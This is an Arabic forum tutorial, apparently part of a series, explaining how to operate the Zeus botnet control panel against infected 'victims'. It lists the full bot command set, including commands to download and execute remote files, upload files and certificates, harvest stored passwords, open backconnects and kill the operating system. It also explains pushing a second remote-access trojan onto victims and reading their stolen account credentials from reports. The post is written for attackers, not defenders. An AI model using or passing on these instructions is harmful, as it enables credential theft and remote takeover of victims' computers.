اليوم معنا شرح بالصور لاوامر بوت نت zeus
و نزلت شرح للاوامر لان الاوامر لم تأخذ حقها الكامل من الشرح فى الشرح السابق
لما تجمع ضحايا و يكونو مثل دا ان شاء الله
![[الشرح الثالث عشر] اوامر بوت نت zeus 116424111](https://2img.net/h/www10.0zz0.com/2012/08/15/11/116424111.png)
تروح لخانة الـ Bots
![[الشرح الثالث عشر] اوامر بوت نت zeus 749589674](https://2img.net/h/www10.0zz0.com/2012/08/15/11/749589674.jpg)
تحدد الضحايا المراد تطبيق الاوامر عليهم و تختار
كود PHP:
Create New Script
![[الشرح الثالث عشر] اوامر بوت نت zeus 631686439](https://2img.net/h/www10.0zz0.com/2012/08/15/11/631686439.jpg)
فتظهر لك نافذة مثل دى
![[الشرح الثالث عشر] اوامر بوت نت zeus 466855023](https://2img.net/h/www10.0zz0.com/2012/08/15/11/466855023.jpg)
طيب اية هى الاوامر ؟؟
هتجد علامة اسفهام بجوار كلمة
كود PHP:
[?] con****
اضغط عليها ستجد الاوامر كلها
![[الشرح الثالث عشر] اوامر بوت نت zeus 429950647](https://2img.net/h/www10.0zz0.com/2012/08/15/11/429950647.jpg)
كود PHP:
reboot Reboot computer.
kos Kill OS.
shutdown Shutdown computer.
bc_add [service] [ip] [port] Add backconnect for [service] using server witn address [ip]:[port].
bc_del [service] [ip] [port] Remove backconnect for [service] (mask is allowed) that use connection to [ip]:[port] (mask is allowed).
block_url [url] Disable access to [url] (mask is allowed).
unblock_url [url] Enable access to [url] (mask is allowed).
block_fake [url] Disable executing of HTTP-fake/inject with mask [url] (mask is allowed).
unblock_fake [url] Enable executing of HTTP-fake/inject with mask [url] (mask is allowed).
rexec [url] [args] Download and execute the file [url] with the arguments [args] (optional).
rexeci [url] [args] Download and execute the file [url] with the arguments [args] (optional) using interactive user.
lexec [file] [args] Execute the local file [file] with the arguments [args] (optional).
lexeci [file] [args] Execute the local file [file] with the arguments [args] (optional) using interactive user.
addsf [file_mask...] Add file masks [file_mask] for local search.
delsf [file_mask...] Remove file masks [file_mask] from local search.
getfile [path] Upload file or folder [path] to server.
getcerts Upload certificates from all stores to server.
resetgrab Upload to server the information from the protected storage, ******s, etc.
upcfg [url] Update configuration file from url [url] (optional, by default used standard url)
re****_bot [****] Re**** bot to [****].
getmff Upload Macromedia Flash files to server.
delmff Remove Macromedia Flash files.
sethomepage [url] Set homepage [url] for Internet Explorer.
يمكن استخدام اى امر بمجرد كتابته فى خانة الاوامر و اختيار create
و الامر الى الكل يسأل عليه هو تحويل الضحية الى برنامج اخر
و الامر هو :
كود PHP:
rexec
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] xe
و سيتم تحميل السيرفر الى الضحية و تشغيله و يصلك على البيفروست مثلا
===================================
اما بخصوص حسابات الضحية تجدها هنا
تقوم بتحديد الضحايا ثم اختيار
Today Reports
ستجد كل ضحية امامه الحسابات الى استخدمها اثناء اتصاله الانترنت
![[الشرح الثالث عشر] اوامر بوت نت zeus 374256396](https://2img.net/h/www10.0zz0.com/2012/08/15/11/374256396.jpg)
====================
اما بخصوص حذف الضحايا فيمكنك تحديد الضحية ثم اختيار
كود PHP:
Remove from database including reports
![[الشرح الثالث عشر] اوامر بوت نت zeus 318052768](https://2img.net/h/www6.0zz0.com/2012/08/15/16/318052768.jpg)
و يمكنك الاستعادة بالفيديو السابق ذكره فى الشرح السابق للتعامل مع الضحايا
كود PHP:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] اى استفسار فى الاوامر برجاء تركة فى موضوع استفسارات الاوامر
بالتوفيق !!!
![[الشرح الثالث عشر] اوامر بوت نت zeus Empty](https://2img.net/i/empty.gif)
موضوع: [الشرح الثالث عشر] اوامر بوت نت zeus ![[الشرح الثالث عشر] اوامر بوت نت zeus Icon_minitime](https://2img.net/i/fa/icon_minitime.gif){kind=icon}
الثلاثاء يوليو 23, 2013 9:43 am
